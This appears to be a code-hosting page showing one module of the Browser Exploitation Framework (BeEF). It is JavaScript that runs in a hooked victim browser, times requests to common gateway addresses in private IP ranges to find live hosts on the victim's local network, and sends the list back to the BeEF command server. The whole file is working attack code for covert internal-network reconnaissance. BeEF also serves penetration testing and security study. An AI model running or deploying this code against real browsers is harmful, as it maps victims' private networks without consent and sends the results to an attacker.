Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
2cc843f64089de3e674afdde471c05e781e41453
beef/modules/network/identify_lan_subnets/command.js
Steve Tauber 2cc843f640 Fixing syntax error in identify_lan_subnets
2017-12-03 20:39:44 +01:00

124 lines
4.0 KiB
JavaScript
Raw Blame History

//
// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
if(!beef.browser.isFF() && !beef.browser.isC()){
beef.debug("[command #<%= @command_id %>] Browser is not supported.");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unsupported browser", beef.are.status_error());
}
var min_timeout = 500;
var ranges = [
'192.168.0.0',
'192.168.1.0',
'192.168.2.0',
'192.168.10.0',
'192.168.100.0',
'192.168.123.0',
'10.0.0.0',
'10.0.1.0',
'10.1.1.0',
'10.10.10.0',
'172.16.0.0',
'172.16.1.0'
];
var doScan = function(timeout) {
var discovered_hosts = [];
var proto = "http";
var doRequest = function(host) {
var d = new Date;
var xhr = new XMLHttpRequest();
xhr.timeout = timeout;
xhr.onreadystatechange = function(){
if(xhr.readyState == 4){
var time = new Date().getTime() - d.getTime();
var aborted = false;
// if we call window.stop() the event triggered is 'abort'
// http://www.w3.org/TR/XMLHttpRequest/#event-handlers
xhr.onabort = function(){
aborted = true;
}
xhr.onloadend = function(){
if(time < timeout){
// 'abort' fires always before 'onloadend'
if(time > 1 && aborted === false){
beef.debug('Discovered host ['+host+'] in ['+time+'] ms');
discovered_hosts.push(host);
}
}
}
}
}
xhr.open("GET", proto + "://" + host, true);
xhr.send();
}
var requests = new Array();
for (var i = 0; i < ranges.length; i++) {
// the following returns like 192.168.0.
var c = ranges[i].split('.')[0]+'.'+
ranges[i].split('.')[1]+'.'+
ranges[i].split('.')[2]+'.';
// for every entry in the 'ranges' array, request
// the most common gateway IPs, like:
// 192.168.0.1, 192.168.0.100, 192.168.0.254
requests.push(c + '1');
requests.push(c + '100');
requests.push(c + '254');
}
// process queue
var count = requests.length;
beef.debug("[command #<%= @command_id %>] Identifying LAN hosts ("+count+" URLs) (Timeout " + timeout + "ms)");
var check_timeout = (timeout * count + parseInt(timeout,10));
var handle = setInterval(function() {
if (requests.length > 0) {
doRequest(requests.pop());
}
}, timeout);
// check for results
checkResults = function() {
if (handle) {
beef.debug("[command #<%= @command_id %>] Killing timer [ID: " + handle + "]");
clearInterval(handle);
handle = 0;
}
var hosts = discovered_hosts.join(",");
beef.debug("Discovered " + discovered_hosts.length + " hosts: " + hosts);
if (discovered_hosts.length >= 5) {
// if we get 5+ results something probably went wrong. this happens sometimes.
if (timeout > min_timeout) {
// if timeout is more than 500ms then decrease timeout by 500ms and try again
beef.debug("Returned large hit rate (" + discovered_hosts.length + " of " + count + ") indicating low network latency. Retrying scan with decreased timeout (" + (timeout - 500) + "ms)");
doScan(timeout-500);
} else {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unexpected results&hosts="+hosts, beef.are.status_error());
}
} else if (discovered_hosts.length == 0) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=no results", beef.are.status_error());
} else {
beef.debug("[command #<%= @command_id %>] Identifying LAN hosts completed.");
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'hosts='+hosts, beef.are.status_success());
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");
}
}
setTimeout("checkResults();", check_timeout);
}
var timeout = "<%= @timeout %>";
if (isNaN(timeout) || timeout < 1) timeout = min_timeout;
doScan(parseInt(timeout,10));
});
Reference in New Issue View Git Blame Copy Permalink